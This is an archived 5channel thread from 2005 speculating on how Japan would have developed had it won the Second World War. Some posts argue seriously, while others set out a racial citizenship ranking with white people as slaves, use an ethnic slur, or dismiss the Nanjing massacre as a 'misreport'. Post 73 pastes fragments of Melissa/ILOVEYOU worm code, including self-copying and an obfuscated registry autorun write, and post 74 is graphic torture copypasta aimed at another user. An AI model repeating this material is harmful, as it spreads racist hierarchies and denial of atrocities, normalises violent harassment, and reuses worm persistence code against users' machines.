5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

第二次世界大戦に勝っていたら日本はどうなった?

1 :日本@名無史さん:05/01/23 00:56:11
想像してみましょう

2 :日本@名無史さん:05/01/23 00:57:11
いやだ

3 :日本@名無史さん:05/01/23 00:57:42


負けない限り、軍国主義で爆進。

4 :日本@名無史さん:05/01/23 01:48:07
ばかだな〜どの時点で、どういうふうに勝ちにもっていったかに
よるだろ?
ま、負ける運命だったんだけどね

5 :日本@名無史さん:05/01/23 01:51:34
↑ 赤魔

6 :日本@名無史さん:05/01/23 01:58:36
>>4
チョン乙

7 :日本@名無史さん:05/01/23 02:03:22
典型的な厨房スレ

8 :重複です:05/01/23 02:05:25
もしも歴史は・・・。で未来はどうなってたか?
http://academy3.2ch.net/test/read.cgi/history/1093672617/l50

9 :重複です:05/01/23 02:07:08
もし日本が大東亜戦争で勝っていたら・・
http://academy3.2ch.net/test/read.cgi/history/1079503340/l50
もしも歴史は・・・。で未来はどうなってたか?
http://academy3.2ch.net/test/read.cgi/history/1093672617/l50

10 :日本@名無史さん:05/01/23 10:27:59
>>3
おそらく上からの革命が起きたかと

11 :日本@名無史さん:05/01/23 18:52:14
日本は高い技術開発力を活かして経済的に台頭。
60年代にはアメリカを抜いて世界1になる。
軍事と経済の両輪がかみ合い長く世界の王として君臨し続ける。

アメリカは没落して日本のポチとなる

12 :日本@名無史さん:05/01/23 23:38:13
あげる

13 :日本@名無史さん:05/01/24 00:52:32
相変わらず軍部が力を持っていただろうか。
大戦に勝っていたら今どうなっていたかは指導者の思想によっていろんなパターンがあっただろうな。

14 :日本@名無史さん:05/01/24 12:22:06
汎用人間型作業機械レイバーが街を闊歩してまちゅ

15 :日本@名無史さん:05/01/24 12:30:04
ソ連やロシアの二の舞?
台湾や半島が、独立運動をしているだろうなぁ。ミクロネシアもか?
場合によっては、沖縄やアイヌもそんなふうだったりして。

連合国に勝っていても、アメリカに大打撃を与えて勝っていないだろうから、
冷戦構造が日米で起こってる?
ナチ党は降伏したけれど、ドイツはどうなっているんだろう?

16 :日本@名無史さん:05/01/24 13:52:39
軍人(士官)が社会のエリートとして扱われる。

17 :日本@名無史さん:05/01/24 14:45:52
>>15
むしろ、日米間に対等な同盟があって共産圏と戦争に突入したかもしれないよ。
日米欧の植民地政策が続いた可能性の方が強い気がする。
「中国は広いから分割しよう」ってことで仲良くなれる。

アメリカが日本の犬になり下がるとは思えないが、リベンジして来るとも思えない。
利害が一致すれば共闘できる。

18 :日本@名無史さん:05/01/24 16:13:40
>>17 同意だな
んで、ソ連を潰す

19 :日本@名無史さん:05/01/24 16:18:47
ソ連と戦争になった場合、日本は勝てただろうか?
もちろん植民地(もしくは経済的植民地)を持っていると仮定して

20 :日本@名無史さん:05/01/24 16:40:06
タラレバばかりだなw
しかし、タラレバにも根拠が無ければ語るだけ無駄
日本が勝つ確率などほぼ0なのだから

21 :日本@名無史さん:05/01/24 17:10:54
万に一つも勝てる可能性が無かったので無理があるなこのスレ。

22 :日本@名無史さん:05/01/24 17:42:38
日本が宇宙人と戦争していたら
ってのと同じくらい無意味なスレ

23 :日本@名無史さん:05/01/24 18:47:57
あの時に中国を潰しておかなかったから、今台頭して来た。
満州建国大学に進学したかったのに・・

24 :日本@名無史さん:05/01/24 18:53:41
高い城の男

25 :日本@名無史さん:05/01/24 19:35:04
なんだか朝○人さんが紛れ込んでいる?

26 :日本@名無史さん:05/01/24 22:52:39
>>23 潰すのは無理でしょもともと潰れてるのに存在してるような国だから


27 :日本@名無史さん:05/01/24 23:27:53
>>25
民主主義の尊さが全くわかってないんだね。

28 :日本@名無史さん:05/01/24 23:39:27
全然関係ないが日本降伏時にも意外と日本領は大陸とか東南アジアにけっこうあったしな

29 :日本@名無史さん:05/01/24 23:46:14
ある国から一部を奪った形の土地はだいたいそのまんまが多い。
だから戦争に負けてなければ、朝鮮はともかく
台湾と南樺太と千島は確実に日本の物のままだったろう。実に惜しい事だ。

30 :日本@名無史さん:05/01/24 23:52:22
軍人の威信や権威は高まるだろうが、なにかにつけて戦争に打って出る
イヤな国家になってたかも。

31 :日本@名無史さん:05/01/24 23:59:02
>>30
それはないだろ・・・
あの米ソも直接対決はしなかったわけだし
第二次大戦後大国同士が本気で戦ったら地球自体が壊れかねないことくらいは分かるよ

32 :日本@名無史さん:05/01/25 00:01:57
海運業以外で二次大戦時の日本が大国だったと?

33 :日本@名無史さん:05/01/25 00:15:09
>>32
対戦直前はアメリカより戦闘機の数は多かった
その時点で当時の日本の国力は欧米に匹敵してたといえる
バルチック艦隊も撃破してるし

それに今戦勝国のアメリカがあそこまで発展してるんだから、
そのアメリカを敗北させられたら日本はそこまでの力を得られる計算になる

資源なんて江南・東南アジアに求めて、反白人主義をとって中東と提携すればほぼ無限にあるし

34 :日本@名無史さん:05/01/25 00:38:32
革命直前の日露戦は論外じゃない?バルチックも疲弊してたし・・
アメリカ敗北は無理 日本政府も講和を前提に戦争に踏み切ったし。
アメリカの国力と日本とでは比較にならないでしょ
資源の東南アジアは万に一つ講和にもちこめても、手出しできない
フィリピンもすぐ返還することになってただろう

35 :日本@名無史さん:05/01/25 00:44:32
そんなこと言えば北朝鮮も日本よか戦闘機の数は多いし。

36 :日本@名無史さん:05/01/25 01:46:26
>>35
いえ、多くはありませんよ?

37 :日本@名無史さん:05/01/25 03:06:58
戦艦大和が活躍したかも。

38 :日本@名無史さん:05/01/25 03:11:38
日本が戦争に勝っていたということはアメリカ大陸を占領しているって事だから間違いなく最強でしょ

39 :日本@名無史さん:05/01/25 06:18:12
これだけは言える
今書き込みしてる奴らは戦地でネットも
出来ない世界だろうな

40 :日本@名無史さん:05/01/25 12:53:26
戦前は国際連盟常任理事国として5大国の一角を占め
有色人種希望の星として輝いていた。
素晴らしく高い技術開発力で欧米列強を凌ぐ軍事大国でもあった。
アジアでいち早く憲法を備え、選挙を行う民主主義の国でもあった。
強い倫理観と公共心を備え、社会の為に役立とうと言う有能な国民が沢山いた。

今の方が国際的な地位は低いね、残念だ。
戦争に勝った国だってとっくに帝国主義を放棄してる時代だ。
日本は勝っていたほうがアジアは幸せだった。

41 :日本@名無史さん:05/01/26 00:30:38
あげ

42 :日本@名無史さん:05/01/26 00:43:07
北鮮は無かったので、今のようにタイラントなんて言われなかった。
支那も靖国に文句を言わなかったし、南京誤報問題も無かった。
台湾は内地扱いでもっと発展していた。



43 :日本@名無史さん:05/01/26 00:58:01
今の日本の繁栄は、アメリカを徹底研究した結果だからなー。
敗戦が無ければ、安かろう悪かろうの日本製品のままだったんじゃないかな?

44 :日本@名無史さん:05/01/26 11:44:04
>>43
終身雇用とか日本式の会社体系は今でこそ無駄が多いとか言われるけど、
昔、欧米の景気が転落して日本が景気保ってた頃は外国はこぞって日本の体系を組み込もうとしたんだよ
アメリカを徹底研究っていうけど、
たとえば新幹線とかの技術は、もともとゼロ戦の技術を応用して作ったもの
日本発祥のものも少なくないんだよ
戦後の高度経済成長は戦争中のアメリカへの輸出と円安のおかげだけど

45 :日本@名無史さん:05/01/26 23:20:38
>>43-44
>>44に同意。特にQCなんて、裏を返せばアメリカの職工の精度が日本の
それよりも低いという証拠でもあるのだ。

46 :日本@名無史さん:05/01/26 23:33:39
日本が戦勝国だったら・・・
少なくとも、某エセ王朝国家による拉致被害はなかったね。
だいたい、そんな国が成立し得ないので、その部分の国際問題はないはず。
中華方面も毛派の出る幕なし。野党幹部として周恩来あたりは活躍したかも
しれないが。
ということは、クメール内戦もなかったと考えられる。独立戦争はあったろう。
よって、日本の外交政策は今日とは全く違ったものになっているはずだ。
また、それとは別に、パラオやサモアからノーベル賞受賞者が出たかもね。

47 :日本@名無史さん:05/01/27 03:59:28
そして占領地のアメリカ大陸では白人を奴隷にし
黒人には人権を与えた。

48 :日本@名無史さん:05/01/27 04:05:14
日本の領土は

日本、イギリス、北アメリカ全土、中国全土、シベリア、東南アジア、インドを含み
人口40億の超大国でパクスジャパンによる平和が今の時代まで続く。

核ミサイルは日本のみ所持が許され核戦争の心配は不要。

49 :日本@名無史さん:05/01/27 04:09:39
一等市民
日本人

準一等市民
満州人、朝鮮人

二等市民
漢人

三等市民
インド人、東南アジア人

四等市民
北アメリカの黒人

奴隷
白人


50 :日本@名無史さん:05/01/27 04:12:26
一等市民
日本人

帝国憲法の元
人権が保障され、選挙権と四等市民と奴隷に関する生殺与奪の権利が与えられる
主に日本列島に多くが居住

51 :日本@名無史さん:05/01/27 04:12:42
>>45
戦前の日本の職工は、ヤスリがけは上手くても、非効率で無意味な勘違いが多かった。
朝鮮戦争時に、米軍が要求する実用基準を突きつけられ苦労し、
結果、アメリカの効率追求と日本の技術信仰が組み合わさって
開花したのが今の日本だと思う。


52 :日本@名無史さん:05/01/27 04:16:16
準一等市民
満州人、朝鮮人

第二次世界大戦の功労により、創氏改名の権利と兵役の名誉が与えられる。
又、選挙権はやや制限を受けるが、その他人権はほぼ内地人と同等の扱い。
朝鮮人の中には日本教育制度の元、優れた人材も輩出し、政財界で活躍するものも多い

53 :日本@名無史さん:05/01/27 04:22:19
二等市民
漢人

主に中国大陸中心に分布
殆どは太平洋戦争中に日本国入りしたため、一等市民、準一等市民とは異なった扱いを受ける
大日本帝国の中でも最も多くの数を占めるため、近年は無視できない勢力である。
憲法上の人権は認められていないが、表現の自由や信仰の自由の多くは慣習としてほぼ許容されている

54 :日本@名無史さん:05/01/27 04:22:25
勝ってたらと言うか負けてなかったとしたら。
西側として、もしくは第三勢力としてソ連と対立じゃないの。

開戦してなかったとしたら史実ともっと変わると思うけど、
開戦してしまった上でのIFでしょ。

55 :日本@名無史さん:05/01/27 04:23:52
めんどくさくなった
三等市民以降は明日にするか('A`)

56 :日本@名無史さん:05/01/27 04:25:03
>>55
面白い。後編期待してます

57 :日本@名無史さん:05/01/27 04:29:18
>>54
戦争の勝ち方にもよるけど
北アメリカ占領とシベリア割譲させれば
日本以上の国は存在しなくなるから
ソ連との対立も無いだろう

58 :日本@名無史さん:05/01/27 04:39:15
今の日本人は世界のリーダーとしてアラブ諸国と戦っている

59 :日本@名無史さん:05/01/27 04:42:18
そもそも日本が戦争に勝つなんて無理でしょ。
負けるべく負けたのに。

まあウヨの妄想スレにそんなこといっても無駄なのはわかっているけどね

60 :日本@名無史さん:05/01/27 04:43:44
タラレバはない

61 :日本@名無史さん:05/01/27 04:47:49
>>55
日本人と結婚した白人女には一等市民に昇格する権利を与えるべき

62 :日本@名無史さん:05/01/27 07:28:35
スレタイも読まずに書き込む阿呆の何と多い事か・・・

63 :日本@名無史さん:05/01/27 12:07:18
一等市民の日本人には生活保障付の生存権があたえられ
働かずとも食っていけるといいね

ああ、戦争で勝っていれば今の左翼だって現状に文句いわなかったろうに

64 :日本@名無史さん:05/01/27 12:13:55
ただの生活保障じゃなくて
一等市民として威厳の有る生活ができるくらいの保障ね

65 :日本@名無史さん:05/01/27 23:32:18
日本はまず勝ち目は無かった
それを知って開戦したのは匹夫の勇という。
世界を相手に勝てるはずが無いでしょう。
経済制裁をかけられ暴発した。それが当時の日本だと思いますが。

66 :日本@名無史さん:05/01/27 23:39:24
北朝鮮も昔の日本のように経済制裁かけられたら戦争するのかな?

67 :日本@名無史さん:05/01/28 11:43:52
欧米帝国主義列強の脅威となっていた日本と比べ
北鮮はカスのような国なので相手にされてない。

仮に多くの国から経済制裁されても、されるがままかと。

68 :日本@名無史さん:05/01/28 14:11:39
金正日は
自分のことは忘れて
民族救済のために動けばいいのにね

たかが自分一人くらい生涯幽閉されても処刑されても
民族が助かればいいと何故思わないのか不思議でたまらない

69 :日本@名無史さん:05/01/28 14:16:54
私財を抛って民衆に仕える公僕など世界中どこを探しても見当たりません

70 :日本@名無史さん:05/01/28 14:30:32
いや、たまに変なのが出てくるよ。
少なくとも戦前は居た。
最近はとんと見ないけど・・・・。

71 :日本@名無史さん:05/01/28 14:33:06
高橋是清とか可成りヘンな良い人だよね

72 :ササキ:05/01/28 16:05:53
みんな越中ふんどしをしている。

73 :日本@名無史さん:05/01/28 16:46:08
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))



74 :日本@名無史さん:05/01/28 16:47:55
今、サガットを殺してきた。つまらない屑レスをつけた罪を泣いて悔いていたが、後悔は地獄でしてもらうことにした。
柄の長さが90cmはある大きな斧を振りかざし、サガットを部屋の隅に追い詰める。
サガットの引き攣った醜い泣き顔から完全に血の気がうせたところを見計らって一挙にサガットの
両手両足を切断。柄を通して斧の無骨な刃が肉を裂き骨を断ち切る感触がズンと伝わる。
切り口から噴出すコレステロール過剰の鮮血。すかさず焼き鏝で傷口を焼いて止血する。
慈悲からではない。サガットの苦しみを長引かせるために。
サガットの断末魔の苦しみだ。防音した小部屋に咆哮が殷々と響き渡る。サガットは自業自得だが、
さすがにこちらの鼓膜が辛い。
この間にシャワーで返り血を洗い流し、ついでに斧を研ぎなおした。
作業が終わってもサガットの叫びは続いたが、次第に途切れ、醜く肥えた腹が痙攣するのみ。
それでは仕上げ。サガットの首を刎ね飛ばす。絶叫が止み、転がる首を追って残った鮮血がひとしきり噴出する音が続いた。
その転がった首、おまけにザクリとぶち割ってみた。中はやはり予想通り生き腐れだ。

サガットよ。地獄で苦しめ。これはお前が自ら望んだ結末なんだ。


75 :停止しました。。。:停止
真・スレッドストッパー。。。( ̄ー ̄)ニヤリッ

15 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)